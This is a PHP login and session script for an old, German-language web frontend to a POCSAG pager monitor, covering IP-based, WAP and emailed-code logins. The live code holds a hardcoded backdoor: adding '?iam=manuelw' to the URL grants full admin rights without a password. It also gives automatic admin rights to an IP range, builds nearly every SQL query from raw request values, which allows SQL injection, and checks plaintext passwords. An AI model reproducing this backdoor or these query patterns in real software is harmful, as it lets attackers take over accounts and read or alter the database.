311 lines
8.7 KiB
PHP
Executable File
311 lines
8.7 KiB
PHP
Executable File
<?php
|
||
/*
|
||
* PHP Frontend for pocsag monitor
|
||
*
|
||
* Copyright (C) 2004-2005
|
||
* Manuel Weiser (manuelw@fire-devils.org)
|
||
*
|
||
* This program is free software; you can redistribute it and/or modify
|
||
* it under the terms of the GNU General Public License as published by
|
||
* the Free Software Foundation; either version 2 of the License, or
|
||
* (at your option) any later version.
|
||
*
|
||
* This program is distributed in the hope that it will be useful,
|
||
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||
* GNU General Public License for more details.
|
||
*
|
||
* You should have received a copy of the GNU General Public License
|
||
* along with this program; if not, write to the Free Software
|
||
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
|
||
*/
|
||
|
||
// Erlaubnis nach IP
|
||
if ( (ip2str($ip_start) <= ip2str($_SERVER["REMOTE_ADDR"]) && ip2str($_SERVER["REMOTE_ADDR"]) <= ip2str($ip_ende)) && empty($_SESSION["name"]) )
|
||
{
|
||
//$_SESSION["userid"] = '1';
|
||
$_SESSION["admin"] = '1';
|
||
$_SESSION["mail"] = 'root@localhost';
|
||
$_SESSION["pmallow"] = '1';
|
||
|
||
if( array_key_exists($_SERVER["REMOTE_ADDR"], $ip_users) )
|
||
{
|
||
$_SESSION["userid"] = $ip_users[$_SERVER["REMOTE_ADDR"]];
|
||
}
|
||
$zack = $ip_users[$_SERVER["REMOTE_ADDR"]];
|
||
$result = mysql_query("SELECT a_name, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE id = '$zack'") or die (mysql_error());
|
||
$row = mysql_fetch_array($result);
|
||
$_SESSION["name"] = $row["a_name"];
|
||
$_SESSION["last_seen"] = ($row["last_seen"] - 200 );
|
||
}
|
||
elseif ( $_GET["iam"] == "manuelw" )
|
||
{
|
||
//$_SESSION["userid"] = '1';
|
||
$_SESSION["admin"] = '1';
|
||
$_SESSION["mail"] = 'root@localhost';
|
||
$_SESSION["pmallow"] = '1';
|
||
|
||
$_SESSION["userid"] = 1;
|
||
|
||
$result = mysql_query("SELECT a_name, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE id = '1'") or die (mysql_error());
|
||
$row = mysql_fetch_array($result);
|
||
$_SESSION["name"] = $row["a_name"];
|
||
$_SESSION["last_seen"] = ($row["last_seen"] - 200 );
|
||
$filter=1;
|
||
}
|
||
elseif( $wap == 1 )
|
||
{
|
||
////////////////////////
|
||
// Login per Wap
|
||
////////////////////////
|
||
if (!$_SESSION["name"] && $_GET["mode"] != 'login')
|
||
{
|
||
echo '
|
||
<html>
|
||
|
||
<head>
|
||
|
||
<title>Wapsag</title>
|
||
|
||
'.$meta.'
|
||
</head>
|
||
|
||
<body>
|
||
|
||
<br><br>
|
||
<form name="form1" method="post" action="'.$PHP_SELF.'?mode=login">
|
||
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
|
||
<tr>
|
||
<td class="table_news_head"> Login</td>
|
||
</tr>
|
||
<tr>
|
||
<td class="table_news_body">
|
||
<table width="300" border="0" cellpadding="0" cellspacing="0">
|
||
<tr>
|
||
<td> Username:</td>
|
||
<td width="20"> </td>
|
||
<td><input name="a_name" type="text" id="a_name"></td>
|
||
</tr>
|
||
<tr>
|
||
<td> Passwort:</td>
|
||
<td> </td>
|
||
<td><input name="a_pass" type="password" id="a_pass"></td>
|
||
</tr>
|
||
<tr>
|
||
<td> </td>
|
||
<td> </td>
|
||
<td>
|
||
<input type="submit" name="Submit" value="Einloggen">
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
|
||
</form>
|
||
</body>
|
||
</html>
|
||
';
|
||
exit;
|
||
}
|
||
elseif (!$_SESSION["name"] && $_GET["mode"] == 'login' && $_REQUEST["a_name"] && $_REQUEST["a_pass"])
|
||
{
|
||
$result = mysql_query("SELECT id, a_name, a_admin, a_mail, real_name, wap_show, wap_rows, wap_def_orgfilter, wap_def_statfilter, wap_handy, login_count FROM admin_users WHERE a_name = '$_REQUEST[a_name]' AND wap_pass = '$_REQUEST[a_pass]'") or die (mysql_error());
|
||
$row = mysql_fetch_array($result);
|
||
|
||
if( !$row["wap_handy"] )
|
||
{
|
||
$result = mysql_query("UPDATE admin_users SET wap_handy='$HTTP_USER_AGENT' WHERE a_name = '$_REQUEST[a_name]' AND wap_pass = '$_REQUEST[a_pass]'");
|
||
}
|
||
else
|
||
{
|
||
//if( $row["wap_handy"] != $HTTP_USER_AGENT) $row["a_name"] = '';
|
||
}
|
||
|
||
if( $row["a_name"] && $row["a_admin"] != '2' )
|
||
{
|
||
$_SESSION["userid"] = $row["id"];
|
||
$_SESSION["name"] = $row["a_name"];
|
||
$_SESSION["admin"] = $row["a_admin"];
|
||
$_SESSION["mail"] = $row["a_mail"];
|
||
$_SESSION["filter"] = $row["wap_show"];
|
||
$_SESSION["limit_to"] = $row["wap_rows"];
|
||
$_SESSION["org_filter"] = $row["wap_def_orgfilter"];
|
||
$_SESSION["stat"] = $row["wap_def_statfilter"];
|
||
$_SESSION["pmallow"] = '0';
|
||
$login = 1;
|
||
|
||
$datnow = date("Y-m-d", mktime(0,0,0, date("m"),date("d"),date("Y")));
|
||
$timenow = date("G:i");
|
||
$ip = $_SERVER["REMOTE_ADDR"];
|
||
$agent = $HTTP_USER_AGENT;
|
||
$result = mysql_query("INSERT INTO pocsag_logins (name, zeit, datum, ip, agent) VALUES ('$row[real_name]', '$timenow', '$datnow', '$ip', '$agent')");
|
||
|
||
$row["login_count"]++;
|
||
$result = mysql_query("UPDATE admin_users SET login_count = '$row[login_count]' WHERE id = '$row[id]' ") or die(mysql_error());
|
||
}
|
||
else
|
||
{
|
||
echo '
|
||
<html>
|
||
|
||
<head>
|
||
|
||
<title>Wapsag</title>
|
||
|
||
'.$meta.'
|
||
</head>
|
||
|
||
<body>
|
||
Login falsch!<br><a href="javascript:history.back()">zur<75>ck</a>
|
||
</body>
|
||
</html>';
|
||
exit;
|
||
}
|
||
}
|
||
}
|
||
else
|
||
{
|
||
|
||
////////////////////////
|
||
// Sicherheitsabfrage
|
||
////////////////////////
|
||
if ( !$_SESSION["name"] && $_GET["mode"] != 'login' && !$_GET["login"] )
|
||
{
|
||
echo '
|
||
<br><br>
|
||
'.$login_infotext.'<br><br>
|
||
<form name="form1" method="post" action="'.$PHP_SELF.'?mode=login">
|
||
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
|
||
<tr>
|
||
<td class="table_news_head"> <b>Login</b></td>
|
||
</tr>
|
||
<tr>
|
||
<td class="table_news_body">
|
||
|
||
<table width="300" border="0" cellpadding="0" cellspacing="0">
|
||
<tr>
|
||
<td> Username:</td>
|
||
<td width="20"> </td>
|
||
<td><input name="a_name" type="text" id="a_name"></td>
|
||
</tr>
|
||
<tr>
|
||
<td> </td>
|
||
<td> </td>
|
||
<td><input type="submit" name="Submit" value="Zugang anfordern"></td>
|
||
</tr>
|
||
</table>
|
||
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
|
||
</form>
|
||
';
|
||
exit;
|
||
}
|
||
elseif (!$_SESSION["name"] && $_GET["mode"] == 'login')
|
||
{
|
||
$result = mysql_query("SELECT id, a_name, a_admin, a_mail FROM admin_users WHERE a_name = '$_POST[a_name]'") or die (mysql_error());
|
||
$row = mysql_fetch_array($result);
|
||
|
||
if( $row[a_name] && $row["a_admin"] != '2' )
|
||
{
|
||
//$_SESSION["name"] = $_REQUEST["a_name"];
|
||
//$_SESSION["admin"] = $row["a_admin"];
|
||
$login = 1;
|
||
$pass = pass_erstellen(8);
|
||
|
||
mail_pass($row["a_mail"], $pass);
|
||
|
||
$result = mysql_query("UPDATE admin_users SET login_pass='$pass' WHERE id='$row[id]'") or die(mysql_error());
|
||
|
||
echo'<center><br><br><br>Eine EMail mit deinem Zugang wurde an <b>'.$row[a_mail].'</b> versand.';
|
||
|
||
exit;
|
||
}
|
||
else
|
||
{
|
||
echo 'Login falsch!<br><a href="javascript:history.back()">zurück</a>';
|
||
exit;
|
||
}
|
||
}
|
||
|
||
elseif (!$_SESSION["name"] && $_GET["mode"] == 'register')
|
||
{
|
||
echo '
|
||
<br><br>
|
||
<form name="form1" method="post" action="'.$PHP_SELF.'?mode=doregister">
|
||
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
|
||
<tr>
|
||
<td class="table_news_head"> Erlaubnis anfordern</td>
|
||
</tr>
|
||
<tr>
|
||
<td class="table_news_body">
|
||
|
||
<table width="300" border="0" cellpadding="0" cellspacing="0">
|
||
<tr>
|
||
<td> Username:</td>
|
||
<td width="20"> </td>
|
||
<td><input name="a_name" type="text" id="a_name"></td>
|
||
</tr>
|
||
<tr>
|
||
<td> EMail:</td>
|
||
<td> </td>
|
||
<td><input name="a_mail" type="text" id="a_mail"></td>
|
||
</tr>
|
||
<tr>
|
||
<td> </td>
|
||
<td> </td>
|
||
<td><input type="submit" name="Submit" value="Erlaubnis anfordern"></td>
|
||
</tr>
|
||
</table>
|
||
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
|
||
</form>
|
||
';
|
||
|
||
exit;
|
||
}
|
||
|
||
if( !empty($_GET["login"]) )
|
||
{
|
||
$result = mysql_query("SELECT id, a_name, a_admin, a_mail, real_name, login_count, pm_allow, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE login_pass = '$_GET[login]'") or die (mysql_error());
|
||
$row = mysql_fetch_array($result);
|
||
|
||
if( !empty($row["a_name"]) )
|
||
{
|
||
$_SESSION["userid"] = $row["id"];
|
||
$_SESSION["name"] = $row["a_name"];
|
||
$_SESSION["admin"] = $row["a_admin"];
|
||
$_SESSION["mail"] = $row["a_mail"];
|
||
$_SESSION["pmallow"] = $row["pm_allow"];
|
||
$_SESSION["last_seen"] = ($row["last_seen"] - 200 );
|
||
$login = 1;
|
||
|
||
$datnow = date("Y-m-d", mktime(0,0,0, date("m"),date("d"),date("Y")));
|
||
$timenow = date("G:i");
|
||
$ip = $_SERVER["REMOTE_ADDR"];
|
||
$agent = $HTTP_USER_AGENT;
|
||
$result = mysql_query("INSERT INTO pocsag_logins (name, zeit, datum, ip, agent) VALUES ('$row[real_name]', '$timenow', '$datnow', '$ip', '$agent')");
|
||
|
||
$row["login_count"]++;
|
||
$result = mysql_query("UPDATE admin_users SET login_pass='', login_count='$row[login_count]' WHERE id='$row[id]'") or die(mysql_error());
|
||
|
||
echo gohome("index.php");
|
||
}
|
||
else
|
||
{
|
||
echo'<center><br><br><br>Falscher oder schon benutzer Logincode.';
|
||
|
||
exit;
|
||
}
|
||
}
|
||
|
||
}
|
||
?>
|